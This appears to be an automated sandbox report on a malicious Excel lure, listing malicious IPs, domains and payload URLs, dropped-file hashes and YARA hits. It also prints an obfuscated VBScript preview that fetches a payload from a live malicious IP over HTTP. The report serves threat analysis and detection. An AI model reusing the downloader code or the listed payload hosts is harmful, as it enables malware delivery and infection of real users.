        • Execution Graph export aborted for target powershell.exe, PID 3440 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • VT rate limit hit for: Ship particulars.xls
        TimeTypeDescription
        11:58:53API Interceptor34x Sleep call for process: EQNEDT32.EXE modified
        11:58:54API Interceptor56x Sleep call for process: wscript.exe modified
        11:58:56API Interceptor13x Sleep call for process: powershell.exe modified
        InputOutput
        URL: Office document Model: gpt-4o
        ```json{  "riskscore": 8,  "reasons": "The screenshot contains a visually prominent button labeled 'Enable Editing' which is highlighted in yellow. The text in the screenshot creates a sense of urgency by stating 'contenido bloqueado, habilite la edicin para ver el documento' and 'Content Locked. Please enable Editing and Content from the Yellow bar above to view locked content.' This type of message is commonly used in phishing attempts to trick users into enabling macros or other potentially harmful features. There is no clear impersonation of well-known brands, but the format and language used are typical of phishing attempts. The sense of urgency is directly connected to the prominent button, increasing the risk of the user being misled into enabling potentially harmful content."}
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        192.185.89.92DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
        • hop.fyi/aNUxj
        457525.xlsGet hashmaliciousUnknownBrowse
        • hop.fyi/mxcbs
        457525.xlsGet hashmaliciousUnknownBrowse
        • hop.fyi/mxcbs
        457525.xlsGet hashmaliciousUnknownBrowse
        • hop.fyi/uW4Kj
        457525.xlsGet hashmaliciousUnknownBrowse
        • hop.fyi/mxcbs
        Scan-Payment-Advice.xlsGet hashmaliciousLokibotBrowse
        • hop.fyi/30dp7
        91.92.254.29Inquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
        • 91.92.254.29/Users_API/HURRICANE/file_2n4kbwex.dbr.txt
        Inquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
        • 91.92.254.29/Users_API/HURRICANE/file_2n4kbwex.dbr.txt
        4YlwTsmpuZ.rtfGet hashmaliciousUnknownBrowse
        • 91.92.254.29/Users_API/syscore/file_xgep41gp.dyp.txt
        188.114.96.3spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
        • www.ad14.fun/oc7s/
        9098393827383039.exeGet hashmaliciousFormBookBrowse
        • www.coinwab.com/kqqj/
        SOA 020724.exeGet hashmaliciousFormBookBrowse
        • www.ad14.fun/az6h/?Vn=Ydx4qJJ0n&3jJlx=2tWzkzncG4ra8DBegJJBToW7oB13AdJXZ1KkbDLW+Ah9MGsNEQDOdLre6u2t4zOJ63yLnsPJ97sPnqMxsSzbOxuABFq0Im2Ecm9EQ8GOdhogxDCvRrrALITlDFg7ZHNgcXHQPxMcHnGf
        Adjunto confirmacion de pedido.exeGet hashmaliciousDBatLoader, FormBookBrowse
        • www.coinwab.com/kqqj/
        aAEsSBx24sxHhRz.exeGet hashmaliciousFormBookBrowse
        • www.camperelektrikde.shop/dy13/?GdIHAFZ=8bNdgr3QvPw6/pDIZNt+55DvjzemDI0RO+pYD3qlulbIe6f7Sn3K06Z4F4Tg3hK83Y0/&BhU=5jl0ddZhNnYlOrV0
        http://sp.26skins.com/steamstore/category/adventure_rpg/?snr=1_5_9__12Get hashmaliciousUnknownBrowse
        • sp.26skins.com/favicon.ico
        30Fqen2Bu3.exeGet hashmaliciousUnknownBrowse
        • filetransfer.io/data-package/TbaYPT0S/download
        30Fqen2Bu3.exeGet hashmaliciousUnknownBrowse
        • filetransfer.io/data-package/TbaYPT0S/download
        Vg46FzGtNo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
        • 000366cm.nyashka.top/phpflowergenerator.php
        QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • filetransfer.io/data-package/mHgyHEv5/download
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        hop.fyiDHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
        • 192.185.89.92
        457525.xlsGet hashmaliciousUnknownBrowse
        • 192.185.89.92
        457525.xlsGet hashmaliciousUnknownBrowse
        • 192.185.89.92
        457525.xlsGet hashmaliciousUnknownBrowse
        • 192.185.89.92
        457525.xlsGet hashmaliciousUnknownBrowse
        • 192.185.89.92
        Scan-Payment-Advice.xlsGet hashmaliciousLokibotBrowse
        • 192.185.89.92
        uploaddeimagens.com.br4YlwTsmpuZ.rtfGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
        • 188.114.96.3
        orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
        • 188.114.96.3
        FedEx Receipt_53065724643.xlsGet hashmaliciousFormBookBrowse
        • 188.114.96.3
        zahtjev za ponudu.xlsGet hashmaliciousUnknownBrowse
        • 188.114.97.3
        INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtfGet hashmaliciousRemcosBrowse
        • 188.114.96.3
        SecuriteInfo.com.Exploit.ShellCode.69.25469.24539.rtfGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        gFTk7fAh55.rtfGet hashmaliciousUnknownBrowse
        • 188.114.97.3
        Comprobante_786765456776780879878968.vbsGet hashmaliciousAgentTeslaBrowse
        • 188.114.97.3
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        AS-COLOCROSSINGUSwcNDx6MT9O.exeGet hashmaliciousRemcosBrowse
        • 107.173.4.16
        cnaniAxghZ.exeGet hashmaliciousRemcosBrowse
        • 107.175.229.139
        execute_and_cleanup.shGet hashmaliciousUnknownBrowse
        • 108.174.58.28
        4YlwTsmpuZ.rtfGet hashmaliciousUnknownBrowse
        • 23.95.235.16
        Payment_Advice.xlsGet hashmaliciousUnknownBrowse
        • 192.3.179.150
        DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
        • 23.95.235.16
        Scan-Payment-Advice.xlsGet hashmaliciousLokibotBrowse
        • 198.46.178.137
        orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
        • 192.3.243.156
        ORDER-7019-2024.jsGet hashmaliciousAgentTeslaBrowse
        • 192.210.215.11
        PO-24701248890.jsGet hashmaliciousWSHRatBrowse
        • 192.210.215.11
        THEZONEBGKVAoyRsrZC.exeGet hashmaliciousUnknownBrowse
        • 91.92.248.9
        MzXmoBVXtU.exeGet hashmaliciousXenoRATBrowse
        • 91.92.248.167
        AVKlyo045S.exeGet hashmaliciousXenoRATBrowse
        • 91.92.248.167
        Inquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
        • 91.92.254.29
        Inquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
        • 91.92.254.29
        RW-TS-Payment204_A3084_04893_D4084_Y5902_CE3018_S4081_W30981.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
        • 91.92.255.36
        4YlwTsmpuZ.rtfGet hashmaliciousUnknownBrowse
        • 91.92.254.29
        02_07_2024_D#U00f6nemi_MEVDUAT Ekstre Bilgiler.exeGet hashmaliciousAsyncRATBrowse
        • 91.92.240.178
        JrBo2dgrUX.exeGet hashmaliciousLokibotBrowse
        • 91.92.240.69
        DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
        • 91.92.254.14
        CLOUDFLARENETUSspec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
        • 188.114.96.3
        Baylor.pdfGet hashmaliciousHTMLPhisherBrowse
        • 172.65.208.22
        03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeGet hashmaliciousFormBookBrowse
        • 23.227.38.74
        https://m.exactag.com/ai.aspx?tc=d9550673bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41tuskerdigital.com%2Fwinner%2F24968%2F%2FdHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ==Get hashmaliciousHTMLPhisherBrowse
        • 104.17.2.184
        AWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
        • 172.67.146.224
        http://ferjex.comGet hashmaliciousUnknownBrowse
        • 104.17.2.184
        RFQ 20726 - T5 7841.exeGet hashmaliciousSnake KeyloggerBrowse
        • 188.114.96.3
        file.exeGet hashmaliciousSnake KeyloggerBrowse
        • 188.114.97.3
        Service Desk - Please verify your Account!.emlGet hashmaliciousHTMLPhisherBrowse
        • 104.17.2.184
        MKCC-MEC-RFQ-115-2024.exeGet hashmaliciousFormBookBrowse
        • 188.114.97.3
        UNIFIEDLAYER-AS-1USspec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
        • 192.185.208.8
        https://mail.pfl.fyi/v1/messages/0190749a-2f6a-7c9f-b37a-88f0ae969ede/click?link_id=0190749a-2ffa-7f41-ad16-3ecda235df51&signature=3e892faf1c0137166fda82e5ff5c6a3150c2cec9Get hashmaliciousHTMLPhisherBrowse
        • 162.144.36.99
        GJRX21GBj3.exeGet hashmaliciousFormBookBrowse
        • 108.179.193.98
        MUdeeReQ5R.exeGet hashmaliciousFormBookBrowse
        • 162.240.81.18
        kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
        • 162.241.62.63
        https://link.mail.beehiiv.com/ls/click?upn=u001.I67xw9O-2FCIng4d3bGWl4wF1gb7u7ov5hHZyE-2Bbx9UTzw17nXfIKdJcwxuwzDNoy2zqPLSJo-2BNEQCUif7aqDwom-2FNyeTx4oiB0wLXwXnzsK4D0yrlxIKEkPM7Cj-2FHMmK1N5sLNWwmlbyGbHeuv6ehAEECnEs6fFQOqqwD-2FKToPwl8ZCnBHVdQ3QU8RWhloPcfXcxa_hzdxOAnI3B-2BYhj5tgQXSRCdoGEcuM88dXETG-2BahO6Uvd8cr2jZPTzAVk72oAubAHPgVJjhCdU6bjbXnflniNIkDzPhLxyvQL1dSWfR-2BUbH1DS3LUwJipSkZoP8d1ryYR0TIdt5CyNutkaFy6gLHYcR4kl-2Fz1ezOldYW2WX0ghZl4CCdgYPK2Cj3fM7MmBqLOIY-2B5u5WgDkBzfdFRbwHzvpAejc0JJJ7tYmz-2BUzjH-2BoYmk-2F0HGjFVUaYNWyGnhGX4EhZzw6qOcJEaxZhVjnDpWPL3U5gs5ZetaaeYkMX5whQyh7U-2B0b4Qj0LqFla1tJlWVR4EZMTu40FIJ9BSbWnjEcc9JxuCrqAu48-2BpVmjPzA43qg6bd2x0AWoed1RbQeWVzBT648qZJ7L-2FqgKPY6ysg2U7IBuGeVI7oxhhKCbXSZln5jVQGdCxXpADLZSMla5T1Id6eeDoJeYo7zr6VqE6vw-3D-3D#aGFydG11dC5zY2htaWR0QGtwcy1jb25zdWx0aW5nLmNvbQ==Get hashmaliciousUnknownBrowse
        • 69.49.230.170
        7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
        • 162.240.81.18
        TRANEXAMIC ACID & CAMPHANEDIOL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
        • 192.254.225.136
        awb_shipping_post_02072024224782020031808174CN18020724000000224(991KB).vbsGet hashmaliciousGuLoaderBrowse
        • 192.185.217.247
        _Account Receipt.PDF.exeGet hashmaliciousAgentTeslaBrowse
        • 192.185.143.105
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        05af1f5ca1b87cc9cc9b25185115607dInquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
        • 188.114.96.3
        Inquiry HA-22-28199 22-Q22024.docGet hashmaliciousFormBookBrowse
        • 188.114.96.3
        4YlwTsmpuZ.rtfGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        Payment_Advice.xlsGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        DHL_AWB 98776013276.xlsGet hashmaliciousFormBookBrowse
        • 188.114.96.3
        orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
        • 188.114.96.3
        FedEx Receipt_53065724643.xlsGet hashmaliciousFormBookBrowse
        • 188.114.96.3
        statement .xlsGet hashmaliciousUnknownBrowse
        • 188.114.96.3
        Bank Slip 2.docGet hashmaliciousSnake KeyloggerBrowse
        • 188.114.96.3
        Scan_Hsbc_Payment_advice.xlsGet hashmaliciousLokibotBrowse
        • 188.114.96.3
        No context
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.02567728950460136
        Encrypted:false
        SSDEEP:6:I3DPc/RvxggLRfUxIUEg/UBRXv//4tfnRujlw//+GtluJ/eRuj:I3DPKLUxz/AvYg3J/
        MD5:B00A0DF851401FC46F13461395BD0F9C
        SHA1:0681C4309AA7AC369AECAC468631BE92346B63B7
        SHA-256:CC1A5A3DCA08AC93291656C42304C5C6B6BDC76BBFE724916380F75376A9877B
        SHA-512:0C8E9813ED48A0D1094A06DE64F8A982C99779BA257489392A41000156DE6800E1BA40E998CF861766CBAF5A7E80080DA706E9E6D4F1795BF8C83311FAC04A0D
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z.h=...!@..<.....S,...X.F...Fa.q...............................1T..J..v.dB,.........G.`.b.L...........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):64
        Entropy (8bit):0.34726597513537405
        Encrypted:false
        SSDEEP:3:Nlll:Nll
        MD5:446DD1CF97EABA21CF14D03AEBC79F27
        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
        Malicious:false
        Reputation:high, very likely benign file
        Preview:@...e...........................................................
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Rich Text Format data, version 1
        Category:dropped
        Size (bytes):184672
        Entropy (8bit):2.266115788745398
        Encrypted:false
        SSDEEP:3072:ze6YTnFFqNpFQ3McRn8VjEBV6fFDa7EBv3hYM0uIV6ycJh:zeRTbJNRn8Vj46fFDmENRYB/V6ycJh
        MD5:2065F134F20986527B4023D59E12081C
        SHA1:3A103CAFE7D928C66D00BD07830A864F549DCCD4
        SHA-256:E35109A09AB67309CDD6455D92BCA6F2B67A11791CFC1DF8008289F0B2A8963F
        SHA-512:D0EB4B4FC98D6D22975825C5EE335801C8FE93B951B5D8D4985D2B67B2CBB209AB6624528BECF06C5C00D5E3046D898552CD0BE43E5F1185954B44F268407726
        Malicious:true
        Yara Hits:
        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uh.uh.uhuhuh.uu.uh[1].doc, Author: ditekSHen
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Reputation:low
        Preview:{\rtf1.............{\*\justification141045327 \-}.{\953954810).?.[~7?-)10.7.^.6:!80%)95_?(*4!=>,..*,.?`0;).6??<?)~|*/-+.&=]4&:.~_/9<^3**-`8@_|+@269-4<>_?^-?7^^?*-.9*%?9<2>>0=>'[%>/8?'+3&;?_%`.'?1/);?2|7])46,:|?;5#1.;<;0?0$4`#='3?^%8,.<<:8;3-.!267,.0?/&)$]4^$6/$..*%=,?!?=?1<~4[=1*&*0%~?`)3@%?*9%+?=;??4(?)||/].%=;*]??$5?&,/0;'=_#:9;8_?3+?1'`8(7?*(.&+!).?63%.83',%@!=<'.%?5'=723]29~2=6~]5->$<2)[#+9@,^?1%.5(8+&=<.(?3!2`]/.8`:=.68:8.6@^[#*5,9%?*)@/%1.%;'?&^,-<0.95?0>?]0;*=_,47:;+.?]!9;&~;^[?%8(]-97@1]6|.-.%&#=9)_&!5>,/!<$4>..0/6&?:[>3.]?4'!@10^_:-'3=.'%&<?%<62)*-)-'@.#!&_/*=[41?]<>3]4_!58..^].<>.?(*_^;]#%)??/%.?#5/9=^'>(]!74?0(5?>.:!+(.<%8.7..(=?_;%_?@,.:.:.#)%2+.6*3!4%_]?[:/.?^0<,_#$1$1$?.]/]^?~6]-%<?$3|=%1=+9%<4%:?>]~![+]-,7/,:?=%?3.;8>4_))%;)?%=.?@0#2$&]*-5....'^%$#&@7.<7?&?=?:`%7#?0^|1?*|9);|=9;%+~?&@4!(_.4)8>0%^&>]?~_=66..?.3)?[>.|%$^!97~:2^~(5..(!~$!#7$!'3'6-%~?(.],?_-.5.5&./9'+*[06`1^+2]]$.]?(/]1~9&=+_^.&?__^!7^|1|>+_]_'')|#[??20?3^.?$#?7%/`8%=0*@$|2.;/[.!)/8+?>#|7.~.5>`<:@'$?$9$3[[5^
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):3490
        Entropy (8bit):3.6906949482142557
        Encrypted:false
        SSDEEP:96:SkfC9YP6kfC9ikfC936xkfC9FkfC9BCkfC9A2N2A2Lv22okfC9+:8ZOA54fg1LHmI
        MD5:F3694C26DDB1CD41FE901D09C6353353
        SHA1:E5EBE307B3984233D87CF9026E2E97521D020C1B
        SHA-256:632A16A322C195DBDC31AFA7CC6A87EEA1086C9C31E955CA728CDFBDAE0E2F22
        SHA-512:73B311755EDD9BB98BD7A603C111DEDAE356693DF97FAEB05BD4A72AA9832B273C51231C48AA2762A30EDF55871DB2356318D7C8A9982C11604F1C0591CB7481
        Malicious:false
        Reputation:low
        Preview:..D.i.m. .N.B.W.i.z.i.K.L.L.p.d.G.N.W.K.h.N.c.h.W.U.i.l.W.G.W.J.K.A.C.m.g.Z.f.A.l.c.e.l.G.K.C.i.U.n.i.n.K.o.e.b.o.c.K.L.U.d.G.i.O.t.h.W.B.k.i.p.k.N.h.K.u.N.G.c.L.p.t.c.R.z.R.h.W.m.i.R.N.O.A.o.f.L.P.I.L.q.L.N.C.,. .a.L.h.W.u.L.Z.p.p.B.t.W.J.p.L.i.a.m.l.d.L.k.K.h.o.b.t.L.Q.e.K.m.q.T.l.c.K.o.b.g.t.f.g.o.N.f.x.W.J.W.h.x.Z.N.c.h.d.Q.i.z.j.u.p.R.O.A.s.a.T.i.q.u.l.K.q.f.G.O.d.i.A.K.u.Z.f.H.L.k.e.m.R.K.L.B.i.K.K.i.K.L.....S.e.t. .N.B.W.i.z.i.K.L.L.p.d.G.N.W.K.h.N.c.h.W.U.i.l.W.G.W.J.K.A.C.m.g.Z.f.A.l.c.e.l.G.K.C.i.U.n.i.n.K.o.e.b.o.c.K.L.U.d.G.i.O.t.h.W.B.k.i.p.k.N.h.K.u.N.G.c.L.p.t.c.R.z.R.h.W.m.i.R.N.O.A.o.f.L.P.I.L.q.L.N.C. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).....N.B.W.i.z.i.K.L.L.p.d.G.N.W.K.h.N.c.h.W.U.i.l.W.G.W.J.K.A.C.m.g.Z.f.A.l.c.e.l.G.K.C.i.U.n.i.n.K.o.e.b.o.c.K.L.U.d.G.i.O.t.h.W.B.k.i.p.k.N.h.K.u.N.G.c.L.p.t.c.R.z.R.h.W.m.i.R.N.O.A.o.f.L.P.I.L.q.L.N.C...O.p.e.n. .".G.E.T.".,. .".h.t.t.p.:././.9.1...9.2...2.5.4...2.9./.U.s.e.r.s._.A.P.I./.s.y.
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 32x48, components 3
        Category:dropped
        Size (bytes):1490
        Entropy (8bit):7.5594921488430655
        Encrypted:false
        SSDEEP:24:5+VnWv0o0XxDuLHeOWXG4OZ7DAJuLHenX3r55P25xl2VZ+3v1En55mJkH0pLcth/:aUFuERAHR257iZIJ+0tihk7xO
        MD5:E005E0017A7777098E1B01D1491758B1
        SHA1:83BA1172DBF6FE3536EC7544517CEED71D55F3C6
        SHA-256:A8E5A601146330F6E8DE21CFAE86C4857AEFBD7189EAD8B330C4B20800FC2E20
        SHA-512:864A86B3301DEB113B0235B328FF472BEF9B69B8AF63BC75D1F0E28A26FE1B082F9AC0CF892A42002EE99857B0CF87F1A3A8AD02BD2514080CD9867E0276A40A
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................0. .."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..g...x._.[.U..|.c!mKMY.%@........./..o...zm......_)..w...8...Pi..i.r.ck?.mZ.n`.c...3.\c..2}j.......V.....6..i..X.x.L...W.V.'..^"n$. .I\."'?3...w..co..>$.|M./.....3>...em.D.....#...lC..p.g.l.J........}..>....u{.....y....ct....f ,..T..q.....5MS...A..f....!..]...z......Mc:].].y...m.F./7........tjk..............H|Q...Aw...1.-h...l..8..cyjZ7....$.~..k....?i
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):677364
        Entropy (8bit):3.4520519665762013
        Encrypted:false
        SSDEEP:3072:6Bc0TA2Y1qh+cJ9kEGr1wwJymeoSpVnAwfASlNidri2/O+:6Bpuoh+quNeNpVAZSedri2/O+
        MD5:AD5695E1C3D35372CB81D8C42A050C11
        SHA1:90D32C7C688F39C232E994B1D71995B13009AA82
        SHA-256:4B2D135512CE91100834195E7034B9787A3E8F5CCF0E61AD206215C26436CA46
        SHA-512:A8207529C63ACA9FFB6EE17EABFF879D18AFBB27A6598C9073E44FFF7A8DB61C9E396F4CE11956053AE0884D0AE36AAECA8D41B215340251090222F24B2E312C
        Malicious:false
        Reputation:low
        Preview:....l............................T...F.. EMF.....U..K.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Rich Text Format data, version 1
        Category:dropped
        Size (bytes):184672
        Entropy (8bit):2.266115788745398
        Encrypted:false
        SSDEEP:3072:ze6YTnFFqNpFQ3McRn8VjEBV6fFDa7EBv3hYM0uIV6ycJh:zeRTbJNRn8Vj46fFDmENRYB/V6ycJh
        MD5:2065F134F20986527B4023D59E12081C
        SHA1:3A103CAFE7D928C66D00BD07830A864F549DCCD4
        SHA-256:E35109A09AB67309CDD6455D92BCA6F2B67A11791CFC1DF8008289F0B2A8963F
        SHA-512:D0EB4B4FC98D6D22975825C5EE335801C8FE93B951B5D8D4985D2B67B2CBB209AB6624528BECF06C5C00D5E3046D898552CD0BE43E5F1185954B44F268407726
        Malicious:true
        Yara Hits:
        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4924813.doc, Author: ditekSHen
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Reputation:low
        Preview:{\rtf1.............{\*\justification141045327 \-}.{\953954810).?.[~7?-)10.7.^.6:!80%)95_?(*4!=>,..*,.?`0;).6??<?)~|*/-+.&=]4&:.~_/9<^3**-`8@_|+@269-4<>_?^-?7^^?*-.9*%?9<2>>0=>'[%>/8?'+3&;?_%`.'?1/);?2|7])46,:|?;5#1.;<;0?0$4`#='3?^%8,.<<:8;3-.!267,.0?/&)$]4^$6/$..*%=,?!?=?1<~4[=1*&*0%~?`)3@%?*9%+?=;??4(?)||/].%=;*]??$5?&,/0;'=_#:9;8_?3+?1'`8(7?*(.&+!).?63%.83',%@!=<'.%?5'=723]29~2=6~]5->$<2)[#+9@,^?1%.5(8+&=<.(?3!2`]/.8`:=.68:8.6@^[#*5,9%?*)@/%1.%;'?&^,-<0.95?0>?]0;*=_,47:;+.?]!9;&~;^[?%8(]-97@1]6|.-.%&#=9)_&!5>,/!<$4>..0/6&?:[>3.]?4'!@10^_:-'3=.'%&<?%<62)*-)-'@.#!&_/*=[41?]<>3]4_!58..^].<>.?(*_^;]#%)??/%.?#5/9=^'>(]!74?0(5?>.:!+(.<%8.7..(=?_;%_?@,.:.:.#)%2+.6*3!4%_]?[:/.?^0<,_#$1$1$?.]/]^?~6]-%<?$3|=%1=+9%<4%:?>]~![+]-,7/,:?=%?3.;8>4_))%;)?%=.?@0#2$&]*-5....'^%$#&@7.<7?&?=?:`%7#?0^|1?*|9);|=9;%+~?&@4!(_.4)8>0%^&>]?~_=66..?.3)?[>.|%$^!97~:2^~(5..(!~$!#7$!'3'6-%~?(.],?_-.5.5&./9'+*[06`1^+2]]$.]?(/]1~9&=+_^.&?__^!7^|1|>+_]_'')|#[??20?3^.?$#?7%/`8%=0*@$|2.;/[.!)/8+?>#|7.~.5>`<:@'$?$9$3[[5^
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):42508
        Entropy (8bit):3.130680758189027
        Encrypted:false
        SSDEEP:384:V0BdXOzLRlc2tFeq4IfK2H/VAZpNfwtgGJRpJ+jX:CNK9lD/jKNwtgGpcjX
        MD5:C01B0D85EF1844F4BEF7669568656F8E
        SHA1:945741B0288F83FC0EF73E75C0D781E40CE3F0E1
        SHA-256:1573F0DBD8721542DDCD8E978ED8000FA19EB58E98D11BED8B97EA54357A303F
        SHA-512:22B820FFD782197F451A12030494B2BE97A8E15EC6892268E5916A2D05F0E85773934E33A10D91C45F89D426BDF080EB3CE349D4FEF725DC799877516231468E
        Malicious:false
        Reputation:low
        Preview:....l...........;...............~@..xW.. EMF................................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%.......................R...p................................@..T.i.m.e.s. .N.e.w. .R.o.m.a.n..........................................................................a.............'.......'.......'............. .........'.......'.......'.....G................*..Ax...N..............T.i.m.e.s. .N.e.w. .R.o...F.....6...............0.'.................................................dv......%...........%...........%.......................T...T...........+...q........i.@...@....Z.......L...............<.......P... ...,...............T...T...,.......W...q........i.@...@,...Z.......L...............<.......P... ...,...............T...T...X...........q........i.@...@X...Z.......L...............<...
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):13328704
        Entropy (8bit):1.564318615176727
        Encrypted:false
        SSDEEP:768:qU3AvhP7YgsXW9s7Z+3Zv6j6M1cv+BINGkIsId5cFXXlG5xK0SN7u:qbo3+3ZviTcvo5kXlG5XSQ
        MD5:AD3D038B3663A33CF38271B59F12A1F8
        SHA1:D0A1E6C2080F04680CAF2296DD2C5A4FC161B943
        SHA-256:FB74C928015B94B4C6FC738B2FEA3864177527A20C019F8EF1D4655E734D2DE7
        SHA-512:BC1BE990B1AE0A934F45F147F0E74D73D8D9F1FAC2A57260E1172A86D35A002E4EFAF74DD42788ACCCCDE8D7F38B922D98535E6E1129D5AA6D3656A14134EFF7
        Malicious:false
        Preview:....l...........P...............A_...... EMF....@a..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q.......'.......................%...........................................................&...........................%...........................6.......P.......%...........L...d...........O...............P.......!...
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):818896
        Entropy (8bit):4.6698547687895005
        Encrypted:false
        SSDEEP:6144:z/lD8DZGpuoh+qjHBMixiMKtG+ZFrTkNeNpVAZSedri2/OK:z/lDRHPpozHjTdiS4ri2/l
        MD5:9CE2D66EEA445F1B18F7A4D3F9353DB3
        SHA1:13A19B11E5CA9BBDB4F775651A53459FB5DD22B0
        SHA-256:D68A63EEFA00B580249BC5FAE50D9D35BDDEB5944A3EF2E7D4E8ECFA49802758
        SHA-512:BA2FFD957BA240F318CE5D9F119EE8096C84D877D0B75669BB781176560CC518AF76F1B7AA88A7DBE96C2EEE7B54D17E816D91558E967BD45EC500BFB74C3D6B
        Malicious:false
        Preview:....l...............H............]...L.. EMF.....~..............................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................I..."...........!...................................................I..."...........!...................................................I..."...........!...................................................I..."...........!...................................................I..."...........!...................................................I...'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 731 x 391, 8-bit/color RGB, interlaced
        Category:dropped
        Size (bytes):114223
        Entropy (8bit):7.9934212565976415
